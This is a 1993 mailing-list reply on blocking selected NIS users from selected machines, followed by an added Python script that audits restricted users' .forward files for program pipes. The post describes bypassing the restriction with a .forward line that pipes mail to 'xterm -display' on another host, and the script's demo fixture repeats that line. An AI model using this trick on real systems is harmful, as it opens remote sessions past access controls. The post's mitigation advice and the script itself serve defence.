Re: Summary of How to disallow selected users access to selected machines

From: Rob Quinn (
Date: Fri Apr 16 1993 - 10:41:51 CDT

In <> (Alexander Bachmann) writes:
>We don't remove the NIS passwd entries for users with -user
>(or -@netgroup) because this will cause trouble with email, when a
>user is not known on the mail-server.

 I have successfully broken into (my own) machines this way. Create a .forward
with something like '|xterm -display machine_I_can_use:0' in it and then send
yourself some mail. With NFS disks, it's easy to create .forwards on other

 If you do go with the '-@netgroup' option, make sure local mail sent out has
full hostnames so that when a user on a restricted machine replies to mail from
a restricted user it won't be a local delivery to the restricted machine. Or
use a central mailhost/MX stuff and deliver all mail on one machine only.
(Did that make sense?)

| "Those who suppress freedom always                             Rob Quinn |
| do so in the name of law                       |
| and order." --John Lindsay                         QuinnBob@KSUVM.BITNET |
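
An audit for the exposure described in this message, added here as an example and not part of the original post: it lists the users excluded by '-user' / '-@netgroup' passwd entries and reports any of their .forward files that hand mail to a program. The netgroup membership map, the home-directory layout and the sample entries are constructed assumptions.

```python
import tempfile
from pathlib import Path

def restricted_users(passwd_lines, netgroups):
    """Users excluded by '-user' / '-@netgroup' entries in a compat passwd file."""
    users = set()
    for line in passwd_lines:
        name = line.strip().split(":", 1)[0]
        if name.startswith("-@"):
            users.update(netgroups.get(name[2:], ()))
        elif len(name) > 1 and name.startswith("-"):
            users.add(name[1:])
    return users

def pipe_targets(forward_text):
    """.forward destinations that hand the message to a program ('|command')."""
    hits = []
    for line in forward_text.splitlines():
        # Naive comma split: a quoted command with a comma is reported truncated.
        for dest in line.split(","):
            dest = dest.strip().strip("\"'").strip()
            if dest.startswith("|"):
                hits.append(dest)
    return hits

def audit(passwd_lines, netgroups, home_root):
    """Map each restricted user to the pipe destinations in their .forward."""
    findings = {}
    for user in sorted(restricted_users(passwd_lines, netgroups)):
        try:
            text = (Path(home_root) / user / ".forward").read_text(errors="replace")
        except OSError:
            continue  # no .forward, or not readable by the auditor
        hits = pipe_targets(text)
        if hits:
            findings[user] = hits
    return findings

def demo():
    passwd = ["root:x:0:0::/root:/bin/sh", "-alice", "-@students", "+::::::"]  # constructed
    netgroups = {"students": ["bob", "carol"]}  # assumed membership map
    forwards = {"alice": '"|xterm -display machine_I_can_use:0"\n',
                "bob": "bob@mailhost.example\n", "dave": "|/usr/local/bin/filter\n"}
    with tempfile.TemporaryDirectory() as root:
        for user, text in forwards.items():  # dave is not restricted, so not reported
            (Path(root) / user).mkdir()
            (Path(root) / user / ".forward").write_text(text)
        return audit(passwd, netgroups, root)

if __name__ == "__main__":
    print(demo())
```

Run it on the mail server (or wherever local delivery happens) against the real passwd file and home directories; any finding means mail delivery can still start a program for a user who is otherwise locked out.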
